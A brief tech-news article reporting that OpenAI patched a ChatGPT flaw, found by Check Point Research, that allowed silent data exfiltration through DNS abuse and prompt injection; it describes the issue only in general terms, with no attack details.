‘A hard truth for the AI era: don’t assume AI tools are secure by default’: OpenAI patches flaw allowing silent data leakage from ChatGPT conversations without users ever knowing



  • Check Point Research found ChatGPT flaw enabling silent data exfiltration via DNS abuse and prompt injection
  • Vulnerability allowed attackers to bypass guardrails and steal sensitive user data through covert domain queries
  • OpenAI patched issue on Feb 20, 2026, marking second major fix that week after Codex command injection flaw

OpenAI has addressed a vulnerability in ChatGPT which allowed threat actors to silently exfiltrate sensitive data from their targets.

The vulnerability was discovered by security experts from Check Point Research (CPR), who warned the bug combined old-fashioned prompt injections with a bypass of built-in guardrails, noting, “AI tools should not be assumed secure by default”.


https://cdn.mos.cms.futurecdn.net/ntFBAvimiZgyDikiV8K7mf-2560-80.jpg



Source link

Latest articles

spot_imgspot_img

Related articles

Leave a reply

Please enter your comment!
Please enter your name here

spot_imgspot_img